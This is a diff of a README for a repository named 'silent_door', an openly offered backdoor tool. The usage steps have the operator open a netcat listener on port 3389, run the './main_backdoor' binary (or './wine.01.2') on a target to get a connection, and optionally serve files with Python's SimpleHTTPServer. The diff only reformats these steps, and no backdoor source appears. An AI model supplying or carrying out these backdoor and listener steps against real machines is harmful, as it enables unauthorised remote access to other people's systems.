mrx6SO/silent_door/README.md

 .... mais por vir.

-# ./sdinstall.sh
+# ./sdinstall.sh | script to install and compile the source.

-Usage:
+# Usage:

 1. nc -lvp 3389

-2. run ./main_backdoor
+2. run ./main_backdoor (or ./wine.01.2)

 3. you have connection.

-# can be very usefull | 4. python -m SimpleHTTPServer 3389
+# can be very usefull.
+4. python -m SimpleHTTPServer 3389

 5. In this pont, just use your skills.